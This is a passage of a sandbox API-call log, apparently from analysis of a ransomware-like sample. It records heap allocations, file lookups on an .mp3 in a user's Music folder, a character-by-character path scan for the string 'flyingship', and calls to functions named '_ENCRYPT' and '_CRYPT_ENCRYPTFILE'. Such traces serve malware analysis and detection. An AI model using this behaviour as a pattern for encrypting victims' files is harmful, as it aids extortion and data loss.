wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0185.439] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b00 [0185.439] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18c0 [0185.439] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9c70 [0185.439] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="no", cchCount1=2, lpString2="no", cchCount2=2) returned 2 [0185.439] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0185.439] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1930 [0185.439] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de970 [0185.439] CharUpperBuffW (in: lpsz="_ENCRYPT", cchLength=0x8 | out: lpsz="_ENCRYPT") returned 0x8 [0185.439] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0185.439] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1890 [0185.439] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ac0 [0185.439] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de8f8 [0185.439] CharUpperBuffW (in: lpsz="_GETFILEEXT", cchLength=0xb | out: lpsz="_GETFILEEXT") returned 0xb [0185.439] PeekMessageW (in: lpMsg=0x87f094, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f094) returned 0 [0185.439] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1770 [0185.439] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de7e0 [0185.439] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd990 [0185.439] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b00 [0185.439] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9a8 [0185.439] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="3", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0185.440] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p3", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0185.440] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mp3", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0185.440] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".mp3", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0185.440] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0185.440] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1ac0 [0185.440] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd978 [0185.440] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b30 [0185.440] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d440 [0185.440] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba138 [0185.440] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1770 [0185.440] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0185.440] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0185.440] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\eGfFOaa4l\\HdCQAGk.mp3", lpFindFileData=0x87eec0 | out: lpFindFileData=0x87eec0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x301269d0, ftCreationTime.dwHighDateTime=0x1d5e55d, ftLastAccessTime.dwLowDateTime=0xda3bfd50, ftLastAccessTime.dwHighDateTime=0x1d5d7d8, ftLastWriteTime.dwLowDateTime=0xda3bfd50, ftLastWriteTime.dwHighDateTime=0x1d5d7d8, nFileSizeHigh=0x0, nFileSizeLow=0x7f10, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="HdCQAGk.mp3", cAlternateFileName="")) returned 0x90add8 [0185.442] FindClose (in: hFindFile=0x90add8 | out: hFindFile=0x90add8) returned 1 [0185.442] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0185.442] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\eGfFOaa4l\\HdCQAGk.mp3", lpFindFileData=0x87eec0 | out: lpFindFileData=0x87eec0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x301269d0, ftCreationTime.dwHighDateTime=0x1d5e55d, ftLastAccessTime.dwLowDateTime=0xda3bfd50, ftLastAccessTime.dwHighDateTime=0x1d5d7d8, ftLastWriteTime.dwLowDateTime=0xda3bfd50, ftLastWriteTime.dwHighDateTime=0x1d5d7d8, nFileSizeHigh=0x0, nFileSizeLow=0x7f10, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="HdCQAGk.mp3", cAlternateFileName="")) returned 0x90add8 [0185.442] FindClose (in: hFindFile=0x90add8 | out: hFindFile=0x90add8) returned 1 [0185.442] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0185.442] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\eGfFOaa4l\\HdCQAGk.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0185.443] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\eGfFOaa4l\\HdCQAGk.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0185.443] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=":\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\eGfFOaa4l\\HdCQAGk.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0185.443] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\eGfFOaa4l\\HdCQAGk.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0185.443] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\eGfFOaa4l\\HdCQAGk.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0185.443] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sers\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\eGfFOaa4l\\HdCQAGk.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0185.443] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ers\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\eGfFOaa4l\\HdCQAGk.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0185.443] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rs\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\eGfFOaa4l\\HdCQAGk.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0185.443] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\eGfFOaa4l\\HdCQAGk.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0185.443] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\eGfFOaa4l\\HdCQAGk.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0185.443] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\eGfFOaa4l\\HdCQAGk.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0185.443] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\eGfFOaa4l\\HdCQAGk.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0185.443] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\eGfFOaa4l\\HdCQAGk.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0185.443] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\eGfFOaa4l\\HdCQAGk.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0185.443] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\eGfFOaa4l\\HdCQAGk.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0185.443] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\eGfFOaa4l\\HdCQAGk.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0185.443] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Jn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\eGfFOaa4l\\HdCQAGk.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0185.443] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="n0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\eGfFOaa4l\\HdCQAGk.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0185.443] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\eGfFOaa4l\\HdCQAGk.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0185.443] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\eGfFOaa4l\\HdCQAGk.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0185.443] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="S HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\eGfFOaa4l\\HdCQAGk.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0185.443] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\eGfFOaa4l\\HdCQAGk.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0185.443] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\eGfFOaa4l\\HdCQAGk.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0185.443] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\eGfFOaa4l\\HdCQAGk.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0185.443] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\eGfFOaa4l\\HdCQAGk.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0185.443] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Pmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\eGfFOaa4l\\HdCQAGk.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0185.444] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\eGfFOaa4l\\HdCQAGk.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0185.444] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\eGfFOaa4l\\HdCQAGk.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0185.444] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\eGfFOaa4l\\HdCQAGk.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0185.444] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="z\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\eGfFOaa4l\\HdCQAGk.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0185.444] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\eGfFOaa4l\\HdCQAGk.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0185.444] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\eGfFOaa4l\\HdCQAGk.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0185.444] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="usic\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\eGfFOaa4l\\HdCQAGk.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0185.444] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sic\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\eGfFOaa4l\\HdCQAGk.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0185.444] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ic\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\eGfFOaa4l\\HdCQAGk.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0185.444] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="c\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\eGfFOaa4l\\HdCQAGk.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0185.444] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\eGfFOaa4l\\HdCQAGk.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0185.444] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\eGfFOaa4l\\HdCQAGk.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0185.444] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\eGfFOaa4l\\HdCQAGk.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0185.444] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="YJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\eGfFOaa4l\\HdCQAGk.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0185.444] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\eGfFOaa4l\\HdCQAGk.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0185.444] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="oLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\eGfFOaa4l\\HdCQAGk.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0185.444] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\eGfFOaa4l\\HdCQAGk.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0185.444] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\eGfFOaa4l\\HdCQAGk.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0185.444] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\eGfFOaa4l\\HdCQAGk.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0185.444] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="QISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\eGfFOaa4l\\HdCQAGk.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0185.444] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\eGfFOaa4l\\HdCQAGk.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0185.444] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SXnK0OL\\fgMpL3n\\rWwrmZhuo4\\eGfFOaa4l\\HdCQAGk.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0185.444] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="XnK0OL\\fgMpL3n\\rWwrmZhuo4\\eGfFOaa4l\\HdCQAGk.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0185.444] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="nK0OL\\fgMpL3n\\rWwrmZhuo4\\eGfFOaa4l\\HdCQAGk.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0185.444] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="K0OL\\fgMpL3n\\rWwrmZhuo4\\eGfFOaa4l\\HdCQAGk.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0185.445] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0OL\\fgMpL3n\\rWwrmZhuo4\\eGfFOaa4l\\HdCQAGk.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0185.445] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="OL\\fgMpL3n\\rWwrmZhuo4\\eGfFOaa4l\\HdCQAGk.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0185.445] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="L\\fgMpL3n\\rWwrmZhuo4\\eGfFOaa4l\\HdCQAGk.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0185.445] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\fgMpL3n\\rWwrmZhuo4\\eGfFOaa4l\\HdCQAGk.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0185.445] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="fgMpL3n\\rWwrmZhuo4\\eGfFOaa4l\\HdCQAGk.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0185.445] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="gMpL3n\\rWwrmZhuo4\\eGfFOaa4l\\HdCQAGk.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0185.445] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MpL3n\\rWwrmZhuo4\\eGfFOaa4l\\HdCQAGk.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0185.445] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="pL3n\\rWwrmZhuo4\\eGfFOaa4l\\HdCQAGk.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0185.445] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="L3n\\rWwrmZhuo4\\eGfFOaa4l\\HdCQAGk.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0185.445] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="3n\\rWwrmZhuo4\\eGfFOaa4l\\HdCQAGk.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0185.445] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="n\\rWwrmZhuo4\\eGfFOaa4l\\HdCQAGk.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0185.445] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\rWwrmZhuo4\\eGfFOaa4l\\HdCQAGk.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0185.445] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rWwrmZhuo4\\eGfFOaa4l\\HdCQAGk.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0185.445] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WwrmZhuo4\\eGfFOaa4l\\HdCQAGk.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0185.445] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="wrmZhuo4\\eGfFOaa4l\\HdCQAGk.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0185.445] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rmZhuo4\\eGfFOaa4l\\HdCQAGk.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0185.445] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mZhuo4\\eGfFOaa4l\\HdCQAGk.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0185.445] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Zhuo4\\eGfFOaa4l\\HdCQAGk.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0185.445] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="huo4\\eGfFOaa4l\\HdCQAGk.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0185.445] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="uo4\\eGfFOaa4l\\HdCQAGk.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0185.448] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="o4\\eGfFOaa4l\\HdCQAGk.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0185.448] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="4\\eGfFOaa4l\\HdCQAGk.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0185.448] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\eGfFOaa4l\\HdCQAGk.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0185.448] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="eGfFOaa4l\\HdCQAGk.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0185.448] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GfFOaa4l\\HdCQAGk.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0185.449] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="fFOaa4l\\HdCQAGk.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0185.449] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="FOaa4l\\HdCQAGk.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0185.449] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Oaa4l\\HdCQAGk.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0185.449] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="aa4l\\HdCQAGk.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0185.449] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="a4l\\HdCQAGk.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0185.449] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="4l\\HdCQAGk.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0185.449] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="l\\HdCQAGk.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0185.449] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\HdCQAGk.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0185.449] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HdCQAGk.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0185.449] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="dCQAGk.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0185.449] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CQAGk.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0185.449] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0185.449] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0185.449] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0185.449] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0185.449] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="3", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0185.449] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p3", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0185.449] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mp3", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0185.449] CompareStringW (Locale=0x400, dwCmpFlags=0x1, 